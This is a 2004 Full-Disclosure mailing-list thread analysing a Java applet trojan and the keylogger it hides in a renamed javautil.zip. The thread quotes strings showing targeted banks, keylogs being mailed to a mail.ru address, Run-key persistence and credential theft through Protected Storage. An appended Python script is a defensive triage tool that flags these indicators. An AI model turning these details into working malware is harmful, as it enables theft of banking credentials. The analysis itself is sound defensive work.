RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukh_at_online.gateway.technolabs.net)
Date: 02/16/04

    To: <n.teusink@planet.nl>, <full-disclosure@lists.netsys.com>
    Date: Mon, 16 Feb 2004 09:22:51 +0530
    
    

    This is a keylogger that will mail out your interesting logs to some Russian address!
    So beware of this one,

    But what I couldn't understand is: how is this file executed?

    -aditya

    > -----Original Message-----
    > From: full-disclosure-admin@lists.netsys.com
    > [mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of
    > n.teusink@planet.nl
    > Sent: Sunday, February 15, 2004 11:40 PM
    > To: full-disclosure@lists.netsys.com
    > Subject: [Full-Disclosure] Re:
    > http://federalpolice.com:article872@1075686747
    >
    >
    > From the source of that page:
    >
    > <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>
    >
    > BlackBox.class is detected immediately by my virus scanner as
    > ClassLoader/E, more info:
    > http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
    >
    > The javautil.zip appears to be an exe file renamed to zip. The
    > exe is compressed with FSG.
    >
    > Interesting pieces of output from strings on the decompressed exe:
    >
    >
    > ----------------------------------------------BEGIN
    > HookerDll.Dll
    > Install
    > Uninstall
    > EDIT
    > %s\%s
    > WVS3
    > \kgn.txt
    > Hooker.dll
    > Install
    > Uninstall
    > Westpac
    > bendigo
    > Bendigo
    > e-bendigo
    > e-Bendigo
    > commbank
    > Commonwealth
    > NetBank
    > Citibank
    > Bank of America
    > e-gold
    > e-bullion
    > e-Bullion
    > evocash
    > EVOCash
    > EVOcash
    > intgold
    > INTGold
    > paypal
    > PayPal
    > bankwest
    > Bank West
    > BankWest
    > National Internet Banking
    > cibc
    > CIBC
    > scotiabank
    > ScotiaBank
    > Scotia Bank
    > bank of montreal
    > Bank of Montreal
    > royalbank
    > Royal Bank
    > RoyalBank
    > tdwaterhouse
    > TD Canada Trust
    > TD Waterhouse
    > president's choice
    > President's Choice
    > President Choice
    > suncorpmetway
    > Suncorp
    > macquarie
    > Macquarie
    > INTgold
    > 1mdc
    > 1MDC
    > TD Waterhouse
    > goldmoney
    > GoldMoney
    > goldgrams
    > pecunix
    > Pecunix
    > Pecun!x
    > hyperwallet
    > HyperWallet
    > Wells Fargo
    > Bank One
    > Banesto
    > CAIXA
    > SunTrust
    > Sun Trust
    > Discover Card
    > Washington Mutual
    > Wachovia
    > desjardins
    > Chase
    > 0+060F0
    > 1$11161J1U1i1
    > 2.2I2\2
    > 3'3,3E3c3h3r3
    > 4%42484>4D4J4P4V4\4b4h4n4t4z4
    > DATA
    > EHLO localhost
    > Subject: KeyLog from (%s)
    > MAIL FROM:<pentasatan@mail.ru>
    > RCPT TO:<pentasatan@mail.ru>
    > SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    > open
    > pstorec.dll
    > PStoreCreateInstance
    > internet explorer
    > http://
    > wininetcachecredentials
    > Cookie:
    > ----------------------------------------------END
    >
    > I think you can draw your own conclusions about this file.
    >
    > Niels
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    ________________________________________________________________________
    Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
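
A worked example added here (it is not part of the original thread and not Niels' or Aditya's code) of the triage steps described in the quoted mail: check whether the applet "archive" is really a ZIP or an MZ/PE executable by its magic bytes, run a strings pass over it, and flag the indicators the dump shows (SMTP exfiltration verbs and the mail.ru address, the Run key used for persistence, pstorec.dll/PStoreCreateInstance for Protected Storage credential theft, the hook DLL, and the bank names). The sample blob is constructed for the demo from the strings in the post; it is not the real javautil.zip, and the magic-byte check is assumed to be applied to the packed file (FSG leaves the MZ/PE header in place), while the strings pass assumes an unpacked copy as in the post.

```python
# Added example, not code from the Full-Disclosure thread. Offline triage of an
# applet "archive" that may be a renamed executable: magic-byte classification,
# a minimal `strings`, and matching against the indicators the post lists.
import re
import struct
from typing import Dict, List

ZIP_MAGIC = b"PK\x03\x04"
MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\x00\x00"

# Indicator patterns taken from the strings dump in the post.
IOC_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "smtp_exfil": re.compile(r"^(EHLO |MAIL FROM:|RCPT TO:)"),
    "keylog_subject": re.compile(r"Subject: KeyLog from", re.I),
    "run_key_persistence": re.compile(r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", re.I),
    "protected_storage": re.compile(r"pstorec\.dll|PStoreCreateInstance", re.I),
    "hook_dll": re.compile(r"hooker(dll)?\.dll", re.I),
}
# Subset of the bank / e-currency names in the dump, lower-cased for matching.
BANK_TERMS = ["westpac", "bendigo", "commbank", "netbank", "citibank",
              "bank of america", "e-gold", "paypal", "cibc", "scotiabank",
              "wells fargo", "wachovia", "chase"]
MAIL_ADDR = re.compile(r"<([^<>@\s]+@[^<>\s]+)>")


def file_kind(data: bytes) -> str:
    """Classify by magic bytes: a real ZIP starts with PK\\x03\\x04; a PE starts
    with MZ and has a PE\\0\\0 signature at the offset stored at 0x3C (e_lfanew)."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(MZ_MAGIC):
        if len(data) < 0x40:
            return "mz"
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE:
            return "pe"
        return "mz"
    return "unknown"


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Equivalent of `strings`: runs of printable ASCII of at least min_len."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(data: bytes) -> Dict[str, object]:
    """Return file kind, matched indicators, exfil addresses and bank names."""
    kind = file_kind(data)
    strings = extract_strings(data)
    iocs: Dict[str, List[str]] = {}
    for s in strings:
        for name, pat in IOC_PATTERNS.items():
            if pat.search(s):
                iocs.setdefault(name, []).append(s)
    addrs: List[str] = []
    for s in strings:
        for a in MAIL_ADDR.findall(s):
            if a not in addrs:
                addrs.append(a)
    lowered = [s.lower() for s in strings]
    banks = sorted({t for t in BANK_TERMS if any(t in s for s in lowered)})
    return {
        "kind": kind,
        "iocs": iocs,
        "mail_addresses": addrs,
        "bank_terms": banks,
        # An "archive" that is not a ZIP and carries exfil/persistence strings.
        "suspicious": kind != "zip" and bool(iocs),
    }


def _fake_pe(strings: List[str]) -> bytes:
    """Constructed test data: an MZ/PE-shaped blob (no real code) that carries
    the given NUL-separated strings after the PE signature."""
    hdr = bytearray(0x40)
    hdr[0:2] = MZ_MAGIC
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> 0x40
    body = b"\x00".join(s.encode("ascii") for s in strings)
    return bytes(hdr) + PE_SIGNATURE + b"\x00" * 20 + body


# Constructed sample: strings lifted from the dump in the post, in a fake PE.
SAMPLE_RENAMED_EXE = _fake_pe([
    "HookerDll.Dll", "Install", "Uninstall", "\\kgn.txt", "Hooker.dll",
    "Westpac", "commbank", "NetBank", "PayPal", "Wells Fargo",
    "EHLO localhost", "Subject: KeyLog from (%s)",
    "MAIL FROM:<pentasatan@mail.ru>", "RCPT TO:<pentasatan@mail.ru>",
    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    "pstorec.dll", "PStoreCreateInstance", "Cookie:",
])
# Constructed sample of how a genuine applet JAR/ZIP starts.
SAMPLE_REAL_ZIP = ZIP_MAGIC + b"\x00" * 26 + b"BlackBox.class"

if __name__ == "__main__":
    for label, blob in (("javautil.zip (renamed exe)", SAMPLE_RENAMED_EXE),
                        ("real zip", SAMPLE_REAL_ZIP)):
        r = triage(blob)
        print(label, "->", r["kind"], "suspicious:", r["suspicious"])
        for name, hits in r["iocs"].items():
            print("  ", name, hits)
        print("   mail:", r["mail_addresses"], "banks:", r["bank_terms"])
```

The magic-byte check is the cheap first step: an ARCHIVE attribute pointing at something that is not a ZIP is already wrong, before any unpacking. The string indicators only become visible after the FSG layer is removed, which is why the post ran strings on the decompressed exe.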

